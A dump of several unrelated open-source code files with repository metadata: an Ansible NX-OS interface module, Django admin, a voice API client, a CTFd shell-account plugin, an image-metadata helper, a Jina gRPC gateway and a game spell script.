transforms it into Ansible structured data as per the resource module's argspec
and the value is then returned in the I(parsed) key within the result.
type: str
config:
description: A dictionary of Layer-3 interface options
type: list
elements: dict
suboptions:
name:
description:
- Full name of L3 interface, i.e. Ethernet1/1.
type: str
required: true
dot1q:
description:
- Configures IEEE 802.1Q VLAN encapsulation on a subinterface.
type: int
ipv4:
description:
- IPv4 address and attributes of the L3 interface.
type: list
elements: dict
suboptions:
address:
description:
- IPV4 address of the L3 interface.
type: str
tag:
description:
- URIB route tag value for local/direct routes.
type: int
secondary:
description:
- A boolean attribute to manage addition of secondary IP address.
type: bool
default: false
ipv6:
description:
- IPv6 address and attributes of the L3 interface.
type: list
elements: dict
suboptions:
address:
description:
- IPV6 address of the L3 interface.
type: str
tag:
description:
- URIB route tag value for local/direct routes.
type: int
redirects:
description:
- Enables/disables ip redirects
type: bool
unreachables:
description:
        - Enables/disables ip unreachables
type: bool
evpn_multisite_tracking:
description:
- VxLAN evpn multisite Interface tracking. Supported only on selected model.
type: str
version_added: 1.1.0
choices:
- fabric-tracking
- dci-tracking
state:
description:
- The state of the configuration after module completion.
- The state I(overridden) would override the IP address configuration
of all interfaces on the device with the provided configuration in
      the task. Use caution with this state as you may lose access to the
device.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- rendered
- parsed
default: merged
"""
EXAMPLES = """
# Using merged
# Before state:
# -------------
#
# interface Ethernet1/6
- name: Merge provided configuration with device configuration.
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/6
ipv4:
- address: 192.168.1.1/24
tag: 5
- address: 10.1.1.1/24
secondary: true
tag: 10
ipv6:
- address: fd5d:12c9:2201:2::1/64
tag: 6
- name: Ethernet1/7.42
dot1q: 42
redirects: false
unreachables: false
state: merged
# After state:
# ------------
#
# interface Ethernet1/6
# ip address 192.168.1.1/24 tag 5
# ip address 10.1.1.1/24 secondary tag 10
# interface Ethernet1/6
# ipv6 address fd5d:12c9:2201:2::1/64 tag 6
# interface Ethernet1/7.42
# encapsulation dot1q 42
# no ip redirects
# no ip unreachables
# Using replaced
# Before state:
# -------------
#
# interface Ethernet1/6
# ip address 192.168.22.1/24
# ipv6 address "fd5d:12c9:2201:1::1/64"
- name: Replace device configuration of specified L3 interfaces with provided configuration.
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/6
ipv4:
- address: 192.168.22.3/24
state: replaced
# After state:
# ------------
#
# interface Ethernet1/6
# ip address 192.168.22.3/24
# Using overridden
# Before state:
# -------------
#
# interface Ethernet1/2
# ip address 192.168.22.1/24
# interface Ethernet1/6
# ipv6 address "fd5d:12c9:2201:1::1/64"
- name: Override device configuration of all L3 interfaces on device with provided
configuration.
cisco.nxos.nxos_l3_interfaces:
config:
    - name: Ethernet1/2
      ipv4:
      - address: 192.168.22.3/24
state: overridden
# After state:
# ------------
#
# interface Ethernet1/2
# ip address 192.168.22.3/24
# interface Ethernet1/6
# Using deleted
# Before state:
# -------------
#
# interface Ethernet1/6
# ip address 192.168.22.1/24
# interface Ethernet1/2
# ipv6 address "fd5d:12c9:2201:1::1/64"
- name: Delete L3 attributes of given interfaces (This won't delete the interface
itself).
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/6
- name: Ethernet1/2
state: deleted
# After state:
# ------------
#
# interface Ethernet1/6
# interface Ethernet1/2
# Using rendered
- name: Use rendered state to convert task input to device specific commands
cisco.nxos.nxos_l3_interfaces:
config:
- name: Ethernet1/800
ipv4:
- address: 192.168.1.100/24
tag: 5
- address: 10.1.1.1/24
secondary: true
tag: 10
- name: Ethernet1/800
ipv6:
- address: fd5d:12c9:2201:2::1/64
tag: 6
state: rendered
# Task Output (redacted)
# -----------------------
# rendered:
# - "interface Ethernet1/800"
# - "ip address 192.168.1.100/24 tag 5"
# - "ip address 10.1.1.1/24 secondary tag 10"
# - "interface Ethernet1/800"
# - "ipv6 address fd5d:12c9:2201:2::1/64 tag 6"
# Using parsed
# parsed.cfg
# ------------
# interface Ethernet1/800
# ip address 192.168.1.100/24 tag 5
# ip address 10.1.1.1/24 secondary tag 10
# no ip redirects
# interface Ethernet1/801
# ipv6 address fd5d:12c9:2201:2::1/64 tag 6
# ip unreachables
# interface mgmt0
# ip address dhcp
# vrf member management
- name: Use parsed state to convert externally supplied config to structured format
cisco.nxos.nxos_l3_interfaces:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Task output (redacted)
# -----------------------
# parsed:
# - name: Ethernet1/800
# ipv4:
# - address: 192.168.1.100/24
# tag: 5
# - address: 10.1.1.1/24
# secondary: True
# tag: 10
# redirects: False
# - name: Ethernet1/801
# ipv6:
# - address: fd5d:12c9:2201:2::1/64
# tag: 6
# unreachables: True
# Using gathered
# Existing device config state
# -------------------------------
# interface Ethernet1/1
# ip address 192.0.2.100/24
# interface Ethernet1/2
# no ip redirects
# ip address 203.0.113.10/24
# ip unreachables
# ipv6 address 2001:db8::1/32
- name: Gather l3_interfaces facts from the device using nxos_l3_interfaces
cisco.nxos.nxos_l3_interfaces:
state: gathered
# Task output (redacted)
# -----------------------
# gathered:
# - name: Ethernet1/1
# ipv4:
# - address: 192.0.2.100/24
# - name: Ethernet1/2
# ipv4:
# - address: 203.0.113.10/24
# ipv6:
# - address: 2001:db8::1/32
# redirects: False
# unreachables: True
"""
RETURN = """
before:
description: The configuration as structured data prior to module invocation.
returned: always
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
after:
description: The configuration as structured data after module completion.
returned: when changed
type: list
sample: >
The configuration returned will always be in the same format
of the parameters above.
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface Ethernet1/2', 'ip address 192.168.0.1/2']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.nxos.plugins.module_utils.network.nxos.argspec.l3_interfaces.l3_interfaces import (
L3_interfacesArgs,
)
from ansible_collections.cisco.nxos.plugins.module_utils.network.nxos.config.l3_interfaces.l3_interfaces import (
L3_interfaces,
)
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
required_if = [
("state", "merged", ("config",)),
("state", "replaced", ("config",)),
("state", "overridden", ("config",)),
("state", "rendered", ("config",)),
("state", "parsed", ("running_config",)),
]
mutually_exclusive = [("config", "running_config")]
module = AnsibleModule(
argument_spec=L3_interfacesArgs.argument_spec,
required_if=required_if,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True,
)
result = L3_interfaces(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
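`required_if` tells `AnsibleModule` that, for example, `state: merged` is only valid when `config` is supplied. The constraint's behavior can be sketched in plain Python (re-implemented for illustration; this is not AnsibleModule's actual validator):

```python
# Each rule reads: when params[key] == value, every name in requirements must be set.
required_if = [
    ("state", "merged", ("config",)),
    ("state", "parsed", ("running_config",)),
]

def missing_requirements(params):
    missing = []
    for key, value, requirements in required_if:
        if params.get(key) == value:
            missing.extend(r for r in requirements if params.get(r) is None)
    return missing
```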
# securesite/payroll/admin.py (simokauranen/payroll_api_localhost, MIT license)
"""Module to add Employee fields to the User admin interface."""
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin as BaseUserAdmin
from django.contrib.auth.models import User
from .models import Employee
class EmployeeInline(admin.StackedInline):
model = Employee
can_delete = False
max_num = 1
verbose_name_plural = 'employee'
class UserAdmin(BaseUserAdmin):
# Add the ssn, salary and last_updated fields to User admin view
inlines = (EmployeeInline,)
admin.site.unregister(User)
admin.site.register(User, UserAdmin)
# qamplus/voice.py (qamplus/qamplus-pythonsdk, MIT license)
class VoiceClient(object):
def __init__(self, base_obj):
self.base_obj = base_obj
self.api_resource = "/voice/v1/{}"
def create(self,
direction,
to,
caller_id,
execution_logic,
reference_logic='',
country_iso2='us',
technology='pstn',
status_callback_uri=''):
api_resource = self.api_resource.format(direction)
return self.base_obj.post(api_resource=api_resource, direction=direction, to=to,
caller_id=caller_id, execution_logic=execution_logic, reference_logic=reference_logic,
country_iso2=country_iso2, technology=technology, status_callback_uri=status_callback_uri)
def update(self, reference_id, execution_logic):
api_resource = self.api_resource.format(reference_id)
return self.base_obj.put(api_resource=api_resource,
execution_logic=execution_logic)
def delete(self, reference_id):
api_resource = self.api_resource.format(reference_id)
return self.base_obj.delete(api_resource=api_resource)
def get_status(self, reference_id):
api_resource = self.api_resource.format(reference_id)
return self.base_obj.get(api_resource=api_resource)
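`VoiceClient` delegates every HTTP verb to the injected `base_obj`, so it can be exercised with a stub transport. A condensed, self-contained sketch (the stub's return values and the real `base_obj` API are assumptions):

```python
class VoiceClient(object):  # condensed copy of the class above, for a self-contained demo
    def __init__(self, base_obj):
        self.base_obj = base_obj
        self.api_resource = "/voice/v1/{}"
    def get_status(self, reference_id):
        return self.base_obj.get(api_resource=self.api_resource.format(reference_id))

class StubBase(object):  # hypothetical transport standing in for the real base object
    def get(self, api_resource):
        return {"resource": api_resource, "status": "completed"}

client = VoiceClient(StubBase())
result = client.get_status("abc123")
```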
| 32.487805 | 102 | 0.652402 | 154 | 1,332 | 5.279221 | 0.227273 | 0.230012 | 0.081181 | 0.088561 | 0.371464 | 0.297663 | 0.258303 | 0.258303 | 0.258303 | 0.258303 | 0 | 0.004077 | 0.263514 | 1,332 | 40 | 103 | 33.3 | 0.824669 | 0 | 0 | 0.111111 | 0 | 0 | 0.013564 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.185185 | false | 0 | 0 | 0 | 0.37037 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
62fd1da94147ad45face770be507f1eb73d0d1b2 | 404 | py | Python | test.py | quantumporium/shopping_cart_project | eae13f76fce82715ddbad5aebb73035b0e1ba258 | [
"MIT"
] | null | null | null | test.py | quantumporium/shopping_cart_project | eae13f76fce82715ddbad5aebb73035b0e1ba258 | [
"MIT"
] | null | null | null | test.py | quantumporium/shopping_cart_project | eae13f76fce82715ddbad5aebb73035b0e1ba258 | [
"MIT"
] | null | null | null | # good structure for a pytest test
from app import shopping_cart
def test_checkout_gives_the_right_value():
    '''Check that shopping_cart.checkout returns the expected totals.'''
    arrange_array = [15, 7, 10]  # arrange
    shopping_cart_array = shopping_cart.checkout(arrange_array)  # act
    assert shopping_cart_array == (31.99, 2.8, 34.79), "checkout in shopping_cart should compute the expected totals."  # assert
test_checkout_gives_the_right_value() | 36.727273 | 120 | 0.747525 | 62 | 404 | 4.532258 | 0.596774 | 0.213523 | 0.106762 | 0.135231 | 0.227758 | 0.227758 | 0.227758 | 0 | 0 | 0 | 0 | 0.044379 | 0.163366 | 404 | 11 | 121 | 36.727273 | 0.786982 | 0.111386 | 0 | 0 | 0 | 0 | 0.182609 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1a05c837044c86fc7d751b18c934f19ce77168a2 | 12,132 | py | Python | examples/challenges/shell-plugin/ctfd/CTFd/plugins/shell-plugin/shell.py | ameserole/Akeso | 868f280e88f44e65e44fbe2f6c43e6b7c92fbcab | [
"MIT"
] | 19 | 2018-02-26T00:19:17.000Z | 2019-12-18T04:26:45.000Z | examples/challenges/shell-plugin/ctfd/CTFd/plugins/shell-plugin/shell.py | ameserole/Akeso | 868f280e88f44e65e44fbe2f6c43e6b7c92fbcab | [
"MIT"
] | 11 | 2018-05-07T15:11:30.000Z | 2018-11-13T16:40:41.000Z | examples/challenges/shell-plugin/ctfd/CTFd/plugins/shell-plugin/shell.py | ameserole/Akeso | 868f280e88f44e65e44fbe2f6c43e6b7c92fbcab | [
"MIT"
] | 1 | 2018-08-28T15:50:09.000Z | 2018-08-28T15:50:09.000Z | import logging
import os
import re
import time
import urllib
from threading import Thread
import xmlrpclib
from Queue import Queue
from flask import current_app as app, render_template, request, redirect, abort, jsonify, json as json_mod, url_for, session, Blueprint
from itsdangerous import TimedSerializer, BadTimeSignature, Signer, BadSignature
from passlib.hash import bcrypt_sha256
from CTFd.utils import sha512, is_safe_url, authed, can_send_mail, sendmail, can_register, get_config, verify_email, validate_url
from CTFd.models import db, Teams, Pages
import CTFd.auth
import CTFd.views
def create_user_thread(q):
while True:
user_pair = q.get(block=True)
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
if user_pair[2] == "create":
shell.add_user(user_pair[0], user_pair[1])
elif user_pair[2] == "change":
shell.change_user(user_pair[0], user_pair[1])
def load(app):
shell = Blueprint('shell', __name__, template_folder='shell-templates')
app.register_blueprint(shell, url_prefix='/shell')
page = Pages('shell',""" """ )
auth = Blueprint('auth', __name__)
shellexists = Pages.query.filter_by(route='shell').first()
if not shellexists:
db.session.add(page)
db.session.commit()
@app.route('/shell', methods=['GET'])
def shell_view():
if not authed():
return redirect(url_for('auth.login', next=request.path))
return render_template('shell.html',root=request.script_root)
@app.route('/register', methods=['POST', 'GET'])
def register():
if not can_register():
return redirect(url_for('auth.login'))
if request.method == 'POST':
errors = []
name = request.form['name']
email = request.form['email']
password = request.form['password']
name_len = len(name) < 2
names = Teams.query.add_columns('name', 'id').filter_by(name=name).first()
emails = Teams.query.add_columns('email', 'id').filter_by(email=email).first()
pass_short = len(password) == 0
pass_long = len(password) > 32
valid_email = re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", request.form['email'])
if not valid_email:
errors.append("That email doesn't look right")
if names:
errors.append('That team name is already taken')
if emails:
errors.append('That email has already been used')
if pass_short:
errors.append('Pick a longer password')
if pass_long:
errors.append('Pick a shorter password')
if name_len:
errors.append('Pick a longer team name')
if len(errors) > 0:
return render_template('register.html', errors=errors, name=request.form['name'], email=request.form['email'], password=request.form['password'])
else:
with app.app_context():
team = Teams(name, email.lower(), password)
db.session.add(team)
db.session.commit()
db.session.flush()
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
shell.add_user(name, password)
session['username'] = team.name
session['id'] = team.id
session['admin'] = team.admin
session['nonce'] = sha512(os.urandom(10))
if can_send_mail() and get_config('verify_emails'): # Confirming users is enabled and we can send email.
db.session.close()
logger = logging.getLogger('regs')
logger.warn("[{0}] {1} registered (UNCONFIRMED) with {2}".format(time.strftime("%m/%d/%Y %X"),
request.form['name'].encode('utf-8'),
request.form['email'].encode('utf-8')))
return redirect(url_for('auth.confirm_user'))
else: # Don't care about confirming users
if can_send_mail(): # We want to notify the user that they have registered.
sendmail(request.form['email'], "You've successfully registered for {}".format(get_config('ctf_name')))
db.session.close()
logger = logging.getLogger('regs')
logger.warn("[{0}] {1} registered with {2}".format(time.strftime("%m/%d/%Y %X"), request.form['name'].encode('utf-8'), request.form['email'].encode('utf-8')))
return redirect(url_for('challenges.challenges_view'))
else:
return render_template('register.html')
def reset_password(data=None):
if data is not None and request.method == "GET":
return render_template('reset_password.html', mode='set')
if data is not None and request.method == "POST":
try:
s = TimedSerializer(app.config['SECRET_KEY'])
name = s.loads(urllib.unquote_plus(data.decode('base64')), max_age=1800)
except BadTimeSignature:
return render_template('reset_password.html', errors=['Your link has expired'])
except:
return render_template('reset_password.html', errors=['Your link appears broken, please try again.'])
team = Teams.query.filter_by(name=name).first_or_404()
password = request.form['password'].strip()
name = team.name
pass_short = len(password) == 0
pass_long = len(password) > 32
#http://stackoverflow.com/questions/19605150/regex-for-password-must-be-contain-at-least-8-characters-least-1-number-and-bot
errors = []
if pass_short:
errors.append('Pick a longer password')
if pass_long:
errors.append('Pick a shorter password')
if len(errors) > 0:
return render_template('reset_password.html', errors=errors)
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
shell.change_user(name, password)
team.password = bcrypt_sha256.encrypt(password)
db.session.commit()
db.session.close()
return redirect(url_for('auth.login'))
if request.method == 'POST':
email = request.form['email'].strip()
team = Teams.query.filter_by(email=email).first()
if not team:
return render_template('reset_password.html', errors=['If that account exists you will receive an email, please check your inbox'])
s = TimedSerializer(app.config['SECRET_KEY'])
token = s.dumps(team.name)
text = """
Did you initiate a password reset?
{0}/{1}
""".format(url_for('auth.reset_password', _external=True), urllib.quote_plus(token.encode('base64')))
sendmail(email, text)
return render_template('reset_password.html', errors=['If that account exists you will receive an email, please check your inbox'])
return render_template('reset_password.html')
def profile():
if authed():
if request.method == "POST":
errors = []
name = request.form.get('name')
email = request.form.get('email')
website = request.form.get('website')
affiliation = request.form.get('affiliation')
country = request.form.get('country')
user = Teams.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
names = Teams.query.filter_by(name=name).first()
name_len = len(request.form['name']) < 2
emails = Teams.query.filter_by(email=email).first()
valid_email = re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email)
password = request.form['password'].strip()
pass_short = len(password) == 0
pass_long = len(password) > 32
if ('password' in request.form.keys() and not len(request.form['password']) == 0) and \
(not bcrypt_sha256.verify(request.form.get('confirm').strip(), user.password)):
errors.append("Your old password doesn't match what we have.")
if not valid_email:
errors.append("That email doesn't look right")
if not get_config('prevent_name_change') and names and name != session['username']:
errors.append('That team name is already taken')
if emails and emails.id != session['id']:
errors.append('That email has already been used')
if not get_config('prevent_name_change') and name_len:
errors.append('Pick a longer team name')
if website.strip() and not validate_url(website):
errors.append("That doesn't look like a valid URL")
if pass_short:
errors.append('Pick a longer password')
if pass_long:
errors.append('Pick a shorter password')
if len(errors) > 0:
return render_template('profile.html', name=name, email=email, website=website,
affiliation=affiliation, country=country, errors=errors)
else:
team = Teams.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
team.name = name
if team.email != email.lower():
team.email = email.lower()
if get_config('verify_emails'):
team.verified = False
session['username'] = team.name
if 'password' in request.form.keys() and not len(request.form['password']) == 0:
team.password = bcrypt_sha256.encrypt(request.form.get('password'))
password = request.form['password'].strip()
team.website = website
team.affiliation = affiliation
team.country = country
name = team.name
if password:
shell = xmlrpclib.ServerProxy('http://localhost:8000',allow_none=True)
shell.change_user(name, password)
db.session.commit()
db.session.close()
return redirect(url_for('views.profile'))
else:
user = Teams.query.filter_by(id=session['id']).first()
name = user.name
email = user.email
website = user.website
affiliation = user.affiliation
country = user.country
prevent_name_change = get_config('prevent_name_change')
confirm_email = get_config('verify_emails') and not user.verified
return render_template('profile.html', name=name, email=email, website=website, affiliation=affiliation,
country=country, prevent_name_change=prevent_name_change, confirm_email=confirm_email)
else:
return redirect(url_for('auth.login'))
app.view_functions['auth.reset_password'] = reset_password
app.view_functions['auth.register'] = register
app.view_functions['views.profile'] = profile
| 45.609023 | 170 | 0.548714 | 1,337 | 12,132 | 4.857143 | 0.18923 | 0.047428 | 0.036957 | 0.020942 | 0.542039 | 0.486911 | 0.456113 | 0.421466 | 0.395904 | 0.352941 | 0 | 0.012757 | 0.334487 | 12,132 | 265 | 171 | 45.781132 | 0.791553 | 0.021513 | 0 | 0.356808 | 0 | 0.00939 | 0.162228 | 0.010619 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028169 | false | 0.215962 | 0.070423 | 0 | 0.187793 | 0.018779 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
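The `register`, `reset_password`, and `profile` views above all rebuild the same name/email/password checks inline. A hedged sketch of what extracting them into one helper could look like (the helper name is hypothetical and is not part of CTFd; the regex and error strings are copied from the views):

```python
import re

# Same email pattern the views above pass to re.match.
EMAIL_RE = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)")

def validate_registration(name, email, password):
    """Collect the same error messages the views build inline."""
    errors = []
    if not EMAIL_RE.match(email):
        errors.append("That email doesn't look right")
    if len(password) == 0:
        errors.append('Pick a longer password')
    if len(password) > 32:
        errors.append('Pick a shorter password')
    if len(name) < 2:
        errors.append('Pick a longer team name')
    return errors

print(validate_registration('ab', 'team@example.com', 'hunter2'))  # []
```

Centralizing the checks would keep the three views from drifting apart when a rule changes (for example, the 32-character password cap).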
1a08401fb30f5417d31f50f1d14aadf818b0ffd5 | 1,056 | py | Python | arsenyinfo/src/utils.py | cortwave/camera-model-identification | b2cbac93308bd6e1bc9d38391f5e97f48da99263 | [
"BSD-2-Clause"
] | 6 | 2018-02-09T11:40:29.000Z | 2021-06-14T06:08:50.000Z | arsenyinfo/src/utils.py | cortwave/camera-model-identification | b2cbac93308bd6e1bc9d38391f5e97f48da99263 | [
"BSD-2-Clause"
] | null | null | null | arsenyinfo/src/utils.py | cortwave/camera-model-identification | b2cbac93308bd6e1bc9d38391f5e97f48da99263 | [
"BSD-2-Clause"
] | 7 | 2018-02-09T11:41:11.000Z | 2021-06-14T06:08:52.000Z | import logging
import subprocess
logging.basicConfig(level=logging.INFO,
format='%(levelname)s: %(name)s: %(message)s (%(asctime)s; %(filename)s:%(lineno)d)',
datefmt="%Y-%m-%d %H:%M:%S", )
logger = logging.getLogger(__name__)
def get_img_attributes(fname):
# ToDo: this should be refactored to be faster
    s = subprocess.run(['identify', '-verbose', fname],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
s = s.stdout.decode().split('\n')
try:
quality = int(list(filter(lambda x: 'Quality' in x, s))[0].split(': ')[-1])
except Exception:
logger.exception(f'Can not parse {fname} quality')
quality = 0
try:
soft = [x for x in s if 'Software' in x]
if soft:
soft = soft[0].split(': ')[-1].lower()
else:
soft = ''
except Exception:
logger.exception(f'Can not parse {fname} software')
soft = ''
return quality, soft
| 29.333333 | 105 | 0.535038 | 127 | 1,056 | 4.401575 | 0.511811 | 0.050089 | 0.025045 | 0.107335 | 0.168157 | 0.168157 | 0.168157 | 0.168157 | 0.168157 | 0 | 0 | 0.006878 | 0.311553 | 1,056 | 35 | 106 | 30.171429 | 0.762036 | 0.041667 | 0 | 0.222222 | 0 | 0.037037 | 0.193069 | 0.023762 | 0 | 0 | 0 | 0.028571 | 0 | 1 | 0.037037 | false | 0 | 0.074074 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
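The parsing half of `get_img_attributes` can be exercised without ImageMagick by feeding it captured output lines. A sketch of that refactor, assuming a hypothetical `parse_identify_output` helper split out from the subprocess call (the sample lines below imitate `identify -verbose` output):

```python
def parse_identify_output(lines):
    """Extract JPEG quality and software tag from `identify -verbose` lines."""
    try:
        # Same logic as above: take the value after 'Quality: '.
        quality = int([x for x in lines if 'Quality' in x][0].split(': ')[-1])
    except (IndexError, ValueError):
        quality = 0
    soft = [x for x in lines if 'Software' in x]
    soft = soft[0].split(': ')[-1].lower() if soft else ''
    return quality, soft

sample = [
    '  Quality: 92',
    '  Software: Adobe Photoshop CC',
]
print(parse_identify_output(sample))  # (92, 'adobe photoshop cc')
```

Splitting parsing from the subprocess call also makes the "ToDo: this should be refactored to be faster" note easier to act on, since the slow part (shelling out per file) is isolated.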
1a0dcd546c9fb9cfb2c22a03b6cf3ce13d629047 | 3,531 | py | Python | jina/peapods/peas/gateway/grpc/__init__.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | [
"Apache-2.0"
] | 1 | 2020-12-23T08:58:49.000Z | 2020-12-23T08:58:49.000Z | jina/peapods/peas/gateway/grpc/__init__.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | [
"Apache-2.0"
] | null | null | null | jina/peapods/peas/gateway/grpc/__init__.py | yk/jina | ab66e233e74b956390f266881ff5dc4e0110d3ff | [
"Apache-2.0"
] | null | null | null | import asyncio
import argparse
import os
from multiprocessing.synchronize import Event
from typing import Union, Dict
import grpc
import zmq.asyncio
from .async_call import AsyncPrefetchCall
from ... import BasePea
from ....zmq import send_message_async, recv_message_async, _init_socket
from .....enums import SocketType
from .....proto import jina_pb2
from .....proto import jina_pb2_grpc
__all__ = ['GatewayPea']
class GatewayPea(BasePea):
def __init__(self,
args: Union['argparse.Namespace', Dict],
ctrl_addr: str,
ctrl_with_ipc: bool,
**kwargs):
super().__init__(args, **kwargs)
self.ctrl_addr = ctrl_addr
self.ctrl_with_ipc = ctrl_with_ipc
def run(self, is_ready_event: 'Event'):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
try:
asyncio.run(self._loop_body(is_ready_event))
except KeyboardInterrupt:
self.logger.info('Loop interrupted by user')
except SystemError as ex:
self.logger.error(f'SystemError interrupted pea loop {repr(ex)}')
except Exception as ex:
self.logger.critical(f'unknown exception: {repr(ex)}', exc_info=True)
finally:
self._teardown()
async def _wait_for_shutdown(self):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
with zmq.asyncio.Context() as ctx, \
_init_socket(ctx, self.ctrl_addr, None, SocketType.PAIR_BIND, use_ipc=True)[0] as sock:
msg = await recv_message_async(sock)
if msg.request.command == 'TERMINATE':
msg.envelope.status.code = jina_pb2.StatusProto.SUCCESS
await self.serve_terminate()
await send_message_async(sock, msg)
async def serve_terminate(self):
"""Shutdown the server with async interface
This method needs to be overridden when inherited from :class:`GatewayPea`
"""
await self.server.stop(0)
async def serve_forever(self, is_ready_event: 'Event'):
"""Serve an async service forever
This method needs to be overridden when inherited from :class:`GatewayPea`
"""
if not self.args.proxy and os.name != 'nt':
os.unsetenv('http_proxy')
os.unsetenv('https_proxy')
self.server = grpc.aio.server(options=[('grpc.max_send_message_length', self.args.max_message_size),
('grpc.max_receive_message_length', self.args.max_message_size)])
jina_pb2_grpc.add_JinaRPCServicer_to_server(AsyncPrefetchCall(self.args), self.server)
bind_addr = f'{self.args.host}:{self.args.port_expose}'
self.server.add_insecure_port(bind_addr)
await self.server.start()
self.logger.success(f'{self.__class__.__name__} is listening at: {bind_addr}')
# TODO: proper handling of set_ready
is_ready_event.set()
await self.server.wait_for_termination()
async def _loop_body(self, is_ready_event: 'Event'):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
try:
await asyncio.gather(self.serve_forever(is_ready_event), self._wait_for_shutdown())
except asyncio.CancelledError:
self.logger.warning('received terminate ctrl message from main process')
await self.serve_terminate()
def __enter__(self):
return self
| 38.802198 | 112 | 0.652223 | 437 | 3,531 | 5.022883 | 0.336384 | 0.025513 | 0.032802 | 0.021868 | 0.21549 | 0.185877 | 0.185877 | 0.153986 | 0.153986 | 0.153986 | 0 | 0.002262 | 0.248938 | 3,531 | 90 | 113 | 39.233333 | 0.825415 | 0.029453 | 0 | 0.061538 | 0 | 0 | 0.124126 | 0.041265 | 0 | 0 | 0 | 0.011111 | 0 | 1 | 0.046154 | false | 0 | 0.2 | 0.015385 | 0.276923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
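The core pattern in `_loop_body` above is `asyncio.gather` racing a long-running server against a shutdown watcher that stops it. A minimal sketch of that shape with plain asyncio (all names below are hypothetical stand-ins, not Jina APIs):

```python
import asyncio

async def serve_forever(stop):
    # Stands in for the gRPC server's wait_for_termination(): blocks until stopped.
    await stop.wait()
    return 'served'

async def wait_for_shutdown(stop):
    # Stands in for _wait_for_shutdown: pretend a TERMINATE message arrived,
    # then stop the server (the role serve_terminate plays above).
    await asyncio.sleep(0.01)
    stop.set()
    return 'terminated'

async def loop_body():
    stop = asyncio.Event()
    # Both coroutines run concurrently; gather returns once both finish.
    return await asyncio.gather(serve_forever(stop), wait_for_shutdown(stop))

result = asyncio.run(loop_body())
print(result)  # ['served', 'terminated']
```

As in the real class, cancelling the gathered tasks (the `asyncio.CancelledError` branch above) is the fallback path when the main process terminates the pea directly.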
1a0ddf6aed80f212b94b5faabe9879bd5b5f6957 | 895 | py | Python | Spell Compendium/scr/Spell1059 - Improvisation.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-04-26T08:03:56.000Z | 2021-04-26T08:03:56.000Z | Spell Compendium/scr/Spell1059 - Improvisation.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 2 | 2021-06-11T05:55:01.000Z | 2021-08-03T23:41:02.000Z | Spell Compendium/scr/Spell1059 - Improvisation.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-05-17T15:37:58.000Z | 2021-05-17T15:37:58.000Z | from toee import *
def OnBeginSpellCast(spell):
print "Improvisation OnBeginSpellCast"
print "spell.target_list=", spell.target_list
print "spell.caster=", spell.caster, " caster.level= ", spell.caster_level
def OnSpellEffect(spell):
print "Improvisation OnSpellEffect"
